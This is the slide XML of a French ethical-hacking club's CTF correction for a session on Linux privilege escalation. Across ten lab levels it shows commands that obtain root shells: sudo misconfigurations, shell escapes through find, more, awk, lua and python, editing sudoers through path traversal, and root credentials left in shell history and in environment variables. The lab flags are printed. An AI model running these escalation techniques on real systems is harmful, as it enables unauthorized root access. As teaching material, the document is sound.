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mfortaa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omforta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08fde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08fde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4899055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489905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4899055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4899055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67962c2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67962c2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4899055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4899055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b4a9fc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b4a9fc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08fde3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08fde3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01f38a4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01f38a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489905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489905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489905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489905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489905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489905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489905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489905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489905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489905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489905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489905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1443475"/>
            <a:ext cx="9144000" cy="369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8475" y="82800"/>
            <a:ext cx="85206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CLUB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 ETHICAL HACKING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9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Edition 2019/2020</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="9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64" y="1532175"/>
            <a:ext cx="2105269" cy="11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125" y="2879969"/>
            <a:ext cx="9144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Séance </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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#4</a:t>
            </a:r>
            <a:b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18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Escalation de privilèges </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="fr" sz="18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1800">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F4CCCC"/>
                </a:highlight>
                <a:latin typeface="Comfortaa"/>
                <a:ea typeface="Comfortaa"/>
                <a:cs typeface="Comfortaa"/>
                <a:sym typeface="Comfortaa"/>
              </a:rPr>
              <a:t>- Linux -</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F4CCC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12 Février 2020</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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 rot="786873">
            <a:off x="7004447" y="2895917"/>
            <a:ext cx="1804771" cy="795015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Correction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8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60875" y="646200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Python 2.7.17 (default, Nov  7 2019, 10:07:09)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import os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os.system('/bin/bash')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level8@clusir-ceh-20200212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</a:t>
            </a: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-l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User level8 may run the following commands on clusir-ceh-20200212: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/usr/bin/free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/usr/bin/clear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(root) NOPASSWD: /usr/bin/awk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/usr/bin/aws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level8@clusir-ceh-20200212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</a:t>
            </a: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awk 'BEGIN {system("/bin/sh")}'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 whoami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 cat /root/flag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${CLUSIRceh2020|aRChiCUr}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3" name="Google Shape;123;p22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9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60875" y="646200"/>
            <a:ext cx="85953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level9@clusir-ceh-20200212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-l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(root) NOPASSWD: /usr/bin/python3 /opt/scripts/pre_connect.py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(root) NOPASSWD: /usr/bin/python3 /opt/scripts/cmder.py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level9@clusir-ceh-20200212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ls /var/log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alternatives.log  apt  bootstrap.log  btmp  dpkg.log  faillog  journal  lastlog  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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scripts.log</a:t>
            </a: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tallylog  wtmp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level9@clusir-ceh-20200212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tail /var/log/scripts.log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[2020-01-31 06:29] detection change on /etc/.cmder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[2020-01-31 06:30] executing cmder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level9@clusir-ceh-20200212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/etc/.cmder/*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use by cmder python3 /opt/scripts/cmder.py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EXPORT _IP=10.0.85.123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EXPORT _PORT=6725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EXPORT _GW=10.0.85.1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EXPORT _PROXY=none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/opt/scripts/enroll.py _IP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0" name="Google Shape;130;p23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9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260875" y="646200"/>
            <a:ext cx="85953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level9@clusir-ceh-20200212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echo "/bin/bash" &gt; /etc/.cmder/cmder.conf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level9@clusir-ceh-20200212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python3 /opt/scripts/cmder.py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:~#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/root/flag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${CLUSIRceh2020|n8N2FB8}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10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60875" y="646200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level10@clusir-ceh-20200212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endParaRPr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root@clusir-ceh-20200212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/root/flag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${CLUSIRceh2020|TooEasy}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" name="Google Shape;144;p25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311700" y="428625"/>
            <a:ext cx="8520600" cy="4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Des questions ?</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr">
                <a:solidFill>
                  <a:srgbClr val="009ED8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rallain</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr">
                <a:solidFill>
                  <a:srgbClr val="009ED8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@cyberprotect.one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Point de contact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Rémi ALLAIN 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&lt;rallain@cyberprotect.one&gt;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Daniel DIAZ 	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&lt;ddiaz@cyberprotect.one&gt;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1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level1@clusir-ceh-20200212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.  ..  .bash_history  .bash_logout  .bashrc  .profile</a:t>
            </a:r>
            <a:b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level1@clusir-ceh-20200212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.bash_history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ls flag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ls -lash flag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cat flag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sudo cat flag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suu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E8h957wHcwM5Vx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su</a:t>
            </a:r>
            <a:b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level1@clusir-ceh-20200212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Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr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B8h956wHcwM5Vx</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="fr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root@clusir-ceh-20200212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:/home/level1#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/root/flag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${CLUSIRceh2020|daLoiRa}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2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level2@clusir-ceh-20200212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.  ..  .bash_logout  .bashrc  .profile</a:t>
            </a:r>
            <a:b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level2@clusir-ceh-20200212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-l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User level2 may run the following commands on clusir-ceh-20200212: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/bin/bash</a:t>
            </a:r>
            <a:b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level2@clusir-ceh-20200212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/bin/bash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root@clusir-ceh-20200212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:/home/level2#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/root/flag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${CLUSIRceh2020|UcKAiLI}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3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60875" y="646200"/>
            <a:ext cx="58497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level3@clusir-ceh-20200212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SSH_CONNECTION=172.20.0.1 37478 172.20.0.4 22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LANG=C.UTF-8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COLLECTOR_AUTH=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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root:RThoOTU3d0hjd001Vng=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USER=level3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PWD=/home/level3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HOME=/home/level3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SSH_CLIENT=172.20.0.1 37478 22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SSH_TTY=/dev/pts/0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MAIL=/var/mail/level3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TERM=xterm-256color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SHELL=/bin/bash</a:t>
            </a:r>
            <a:b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level3@clusir-ceh-20200212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Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr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E8h957wHcwM5Vx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root@clusir-ceh-20200212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:/home/level3#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/root/flag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${CLUSIRceh2020|tionseU}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6640700" y="827250"/>
            <a:ext cx="25032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base64 decode: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RThoOTU3d0hjd001Vng=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-&gt;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74EA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E8h957wHcwM5Vx</a:t>
            </a:r>
            <a:endParaRPr b="1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6590550" y="2136000"/>
            <a:ext cx="0" cy="14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4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60875" y="646200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level4@clusir-ceh-20200212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-l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User level4 may run the following commands on clusir-ceh-20200212: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/usr/bin/free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/usr/bin/clear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/usr/bin/find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/bin/ls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/usr/bin/users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/usr/bin/locale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/bin/mkdir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/usr/bin/who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/usr/bin/w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/usr/bin/arch</a:t>
            </a:r>
            <a:b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level4@clusir-ceh-20200212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find -exec /bin/sh \;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whoami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/root/flag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${CLUSIRceh2020|eNsonou}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5" name="Google Shape;95;p18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5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60875" y="646200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level5@clusir-ceh-20200212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-l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User level4 may run the following commands on clusir-ceh-20200212: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/usr/bin/free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/usr/bin/clear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/bin/more /home/level5/*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/bin/ls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level5@clusir-ceh-20200212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more /root/flag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Sorry, user level5 is not allowed to execute '/bin/more /root/flag' as root on clusir-ceh-20200212.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level5@clusir-ceh-20200212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more /home/level5/.bashrc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!sh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whoami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/root/flag</a:t>
            </a:r>
            <a:b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${CLUSIRceh2020|x64E2gM9}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6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60875" y="646200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level6@clusir-ceh-20200212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-l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User level6 may run the following commands on clusir-ceh-20200212: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/usr/bin/free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/usr/bin/clear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/bin/nano /var/www/*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…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level6@clusir-ceh-20200212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nano /var/www/../../etc/sudoers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level6 ALL = (ALL)  NOPASSWD: ALL</a:t>
            </a:r>
            <a:endParaRPr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level6@clusir-ceh-20200212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-i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root@clusir-ceh-20200212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:~#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cat /root/flag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${CLUSIRceh2020|GenTBOB}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Niveau 7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60875" y="646200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Lua 5.3.3  Copyright (C) 1994-2016 Lua.org, PUC-Rio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os.execute('/bin/bash')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level7@clusir-ceh-20200212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</a:t>
            </a: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-l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User level7 may run the following commands on clusir-ceh-20200212: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(root) NOPASSWD: /usr/bin/lua5.3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level7@clusir-ceh-20200212</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="f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:~$</a:t>
            </a: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sudo lua5.3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Lua 5.3.3  Copyright (C) 1994-2016 Lua.org, PUC-Rio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fr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os.execute('cat /root/flag')</a:t>
            </a:r>
            <a:endParaRPr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${CLUSIRceh2020|Ajg9sopQ}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true		exit		0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6" name="Google Shape;116;p21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